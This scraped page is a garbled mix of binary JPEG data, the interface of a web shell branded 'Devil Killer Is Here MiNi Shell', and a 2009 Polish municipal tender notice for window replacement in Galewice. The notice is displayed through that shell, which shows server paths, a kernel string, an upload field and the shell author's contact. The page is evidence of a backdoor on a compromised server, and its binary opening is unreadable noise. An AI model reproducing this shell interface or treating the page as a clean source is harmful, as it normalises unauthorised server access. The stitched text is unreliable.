JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091008/173067-N-2009.html

<p class="kh_header"><b>Galewice: TERMOMODERNIZACJA BUDYNKU URZĘDU GMINY W GALEWICACH - WYMIANA STOLARKI OKIENNEJ NA ELEWACJI TYLNIEJ.</b><br>
<b>Numer ogłoszenia: 173067 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Galewice , ul. Wieluńska 5, 98-405 Galewice, woj. łódzkie, tel. 062 7838039, faks 062 7838039.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TERMOMODERNIZACJA BUDYNKU URZĘDU GMINY W GALEWICACH - WYMIANA STOLARKI OKIENNEJ NA ELEWACJI TYLNIEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wymiana stolarki okiennej i parapetów wewnętrznych szt. 20 na okna zespolone PCV przeznaczonych dla obiektów użyteczności publicznej posiadających certyfikat na znak bezpieczeństwa, deklarację zgodności z Polską Normą lub aprobatę techniczną z szybą nisko emisyjną, z funkcją mikrorozszczelnienia, z współczynnikiem przenikania ciepła dla całego okna U=1,7 W/m2K z szybą antywłamaniową  na parterze i piętra dla jednego okna, kolor wewnętrzny biały, zewnętrzny brązowy (RAL jak istniejące drzwi główne przedmiotowego budynku) i parapety wewnętrzne z PCV kolor biały z obróbkami tynkarskimi, wyprawkami malarskimi i demontażem i montażem istniejących parapetów stalowych, zgodnie z projektem, specyfikacją techniczną wykonania i odbioru robót budowlanych, normami, sztuką budowlaną na elewacji tylniej budynku Urzędu Gminy w Galewicach ul. Wieluńska 5  
1. Szczegółowy opis przedmiotu zamówienia z przedmiarem znajduje się w załączniku nr 1 do   Specyfikacji Istotnych Warunków Zamówienia. 
2. Nie dopuszcza się składania ofert częściowych. Oferty, które nie będą obejmować wszystkich części zamówienia zostaną odrzucone.
3. Zamawiający nie przewiduje zamówień uzupełniających i wnoszenia ofert wariantowych.
4. Wykonawca odpowiedzialny jest za wykonanie zadania zgodnie z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia w specyfikacji technicznej wykonania i odbioru robót jak również zgodnie z projektem budowlano-wykonawczym.
5. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
6. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu umowy.
7. Wymagane jest wskazanie przez Wykonawcę w ofercie tych części zamówienia, które w
Wykonawca zamierza powierzyć podwykonawcom.
8.  Wymagane jest aby oferent załączył do swojej oferty wykaz materiałów podstawowych i urządzeń z parametrami technicznymi i wskazał ich producenta.
9. Zamawiający wymaga udzielenia minimum 60 miesięcy gwarancji na wykonany przedmiot zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-9, 45.26.25.00-6, 45.44.21.00-8, 45.42.10.00-4, 45.42.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wszelkie informacje przedstawione w niniejszej Specyfikacji Istotnych Warunków Zamówienia przeznaczone są wyłącznie w celu przygotowania oferty i w żadnym wypadku nie powinny być wykorzystywane w inny sposób, ani udostępniane osobom nie uczestniczącym w postępowaniu.
2. Ilekroć w Specyfikacji Istotnych Warunków Zamówienia zastosowane jest pojęcie ustawa, bez bliższego określenia, o jaką ustawę chodzi, dotyczy ono ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tekst jednolity Dz. U.2007r. Nr 223, poz.1655 z późniejszymi zmianami)
3. Wszelkie koszty związane z przygotowaniem oferty ponosi oferent.
4. Postępowanie o udzielenie zamówienia publicznego może zostać unieważnione jedynie w przypadkach określonych w art. 93 ust.1 ustawy. O unieważnieniu postępowania o udzielenie zamówienia zamawiający zawiadamia równocześnie wszystkich Wykonawców, którzy ubiegali się o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
5. Zamawiający w szczególnie uzasadnionych przypadkach zastrzega sobie prawo zmiany lub uzupełnienia treści Specyfikacji Istotnych Warunków Zamówienia. Zmiana może mieć miejsce w każdym czasie, przed upływem terminu składania ofert. W przypadku  wprowadzenia takiej zmiany, informacja o tym zostanie niezwłocznie doręczona wszystkim oferentom i będzie dla nich wiążąca.
6. Informacja o warunkach jakie muszą spełniać oferenci;
a) spełniają wszystkie wymagania wynikające z oświadczeń, których listę przedstawiono w punkcie VII,
b) -nie podlegają wykluczeniu na podstawie art.24, ust.1 i 2 ustawy z dnia 29 stycznia
       2004roku Prawo zamówień publicznych ( tekst jednolity Dz.U.2007r. Nr 223, poz1655 z 
       późniejszymi zmianami),
     -posiadają uprawnienia do wykonywania działalności objętych niniejszym zamówieniem, 
     -posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
      osobami zdolnymi do wykonania zamówienia,
      Wykonawca musi wykazać, że:
     -kierownik budowy, posiada uprawnienia budowlane do sprawowania samodzielnych 
       funkcji technicznych w budownictwie w zakresie realizowanego zadania i jest 
       członkiem Izby Inżynierów Budownictwa,
      -wykonał z należytą starannością w okresie ostatnich 5-lat, a jeżeli okres prowadzenia 
       działalności jest krótszy w tym okresie co najmniej jedno równoważne zamówienie 
        o wartości nie mniejszej niż 80% ceny ofertowej brutto,
      -znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
        zamówienia.
7. Stwierdzenie spełnienia w/w warunków polegać będzie na analizie i ocenie dokumentów lub oświadczeń złożonych przez Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie obowiązującego w tym zakresie Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U.Nr 87, poz. 605) określa się poniżej wymagane dokumenty i złożenie oświadczenia według załącznika nr 3:
1.	W celu potwierdzenia posiadania przez Wykonawcę uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu na podstawnie art. 24 ustawy, od oferentów ubiegających się o przyznanie zamówienia wymagane jest przedstawienie wymienionych niżej dokumentów, 
a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do
           ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
           rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie
           wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)   aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków,
      opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że
      uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
      płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- 
      wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2. W celu potwierdzenia posiadania przez  wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca powinien przedłużyć następujące dokumenty:
    a) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem 
       wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
       działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością 
        robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości 
        oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że
        roboty te wykonane zostały należycie;
b) Oświadczenie , informację o osobie przewidzianej na stanowisko kierownika budowy 
     wraz z dokumentami potwierdzającymi posiadane uprawnień budowlanych do
     sprawowania samodzielnych funkcji technicznych w budownictwie i dokument 
     potwierdzający przynależność do Izby Inżynierów Budownictwa w zakresie
         realizowanego zadania.
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym  ma siedzibę lub miejsce zamieszkania zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U.Nr 87, poz. 605)


4.W celu określenia wartości zamówienia i potwierdzenia, że oferta wykonawcy odpowiada wymaganiom określonym przez zamawiającego, wykonawca powinien złożyć następujące dokumenty;
a)	-podać wartość zamówienia wyliczoną na podstawie pkt XV SIWZ Opis sposobu
       obliczania ceny oferty,
b)  - przedstawić zestawienie materiałów,   
c)  - podać parametry techniczne dla podstawowych materiałów z ich certyfikatami
        na znak bezpieczeństwa, deklarację zgodności z Polską Normą lub aprobatą
       techniczną, nazwy handlowe i adresy producenta,
d)   -harmonogram realizacji robót,
e)   -warunki i okres gwarancji (wymagany  okres gwarancji-60 miesięcy),
f)  -wypełniony formularz ofertowy według załącznika nr 2. 
Dokumenty składane w formie kserokopii winny być poświadczone za zgodność z oryginałem przez osobę upoważnioną.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.galewice.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Galewice;ul.Wieluńska 5; 98-405 Galewice pok.309.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2009 godzina 11:00, miejsce: Urząd Gminy Galewice;ul.Wieluńska 5; 98-405 Galewice pok.208.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com